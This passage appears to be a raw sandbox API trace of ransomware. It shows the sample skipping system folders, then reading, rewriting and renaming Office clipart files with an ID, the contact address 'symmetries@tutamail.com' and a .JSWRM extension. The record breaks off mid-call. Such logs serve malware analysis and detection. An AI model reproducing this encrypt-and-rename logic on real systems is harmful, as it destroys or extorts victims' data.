CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151055.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151055.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0083.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0083.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0083.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0083.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.543] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14632) returned 1 [0083.543] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3920) returned 0x24d210 [0083.543] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3920, lpOverlapped=0x0) returned 1 [0083.599] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.599] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3920, lpOverlapped=0x0) returned 1 [0083.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.599] CloseHandle (hObject=0x314) returned 1 [0083.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0083.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0083.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0083.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0083.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0083.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0083.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0083.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0083.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a60, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151061.WMF", cAlternateFileName="")) returned 1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2=".") returned 1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="..") returned 1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="...") returned 1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="windows") returned -1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="recovery") returned -1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="perflogs") returned -1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="documents and settings") returned 1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="system volume information") returned -1 [0083.602] lstrcmpiW (lpString1="J0151061.WMF", lpString2="msocache") returned -1 [0083.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0083.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151061.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151061.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151061.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0083.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0083.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151061.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151061.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151061.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0083.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0083.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0083.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0083.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.603] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6752) returned 1 [0083.603] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a60) returned 0x205850 [0083.603] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a60, lpOverlapped=0x0) returned 1 [0083.617] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.617] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a60, lpOverlapped=0x0) returned 1 [0083.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0083.617] CloseHandle (hObject=0x314) returned 1 [0083.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0083.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0083.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0083.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0083.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0083.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0083.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0083.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0083.618] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151061.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151061.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0083.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0083.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0083.619] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151063.WMF", cAlternateFileName="")) returned 1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2=".") returned 1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="..") returned 1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="...") returned 1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="windows") returned -1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="recovery") returned -1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="perflogs") returned -1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="documents and settings") returned 1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="system volume information") returned -1 [0083.619] lstrcmpiW (lpString1="J0151063.WMF", lpString2="msocache") returned -1 [0083.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0083.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151063.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151063.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151063.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0083.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0083.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151063.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151063.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151063.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0083.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0083.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0083.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0083.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.620] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10632) returned 1 [0083.620] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24d210 [0083.620] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2980, lpOverlapped=0x0) returned 1 [0083.635] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.635] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2980, lpOverlapped=0x0) returned 1 [0083.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.635] CloseHandle (hObject=0x314) returned 1 [0083.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0083.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0083.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0083.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0083.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0083.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0083.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.635] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0083.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0083.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0083.636] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3394, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0151067.WMF", cAlternateFileName="")) returned 1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2=".") returned 1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2="..") returned 1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2="...") returned 1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2="windows") returned -1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2="recovery") returned -1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2="perflogs") returned -1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2="documents and settings") returned 1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.636] lstrcmpiW (lpString1="J0151067.WMF", lpString2="system volume information") returned -1 [0083.637] lstrcmpiW (lpString1="J0151067.WMF", lpString2="msocache") returned -1 [0083.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0083.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151067.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151067.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151067.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0083.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0083.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151067.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0151067.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0151067.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0083.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0083.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0083.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0083.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.637] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13204) returned 1 [0083.637] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3390) returned 0x24d210 [0083.637] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3390, lpOverlapped=0x0) returned 1 [0083.650] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, 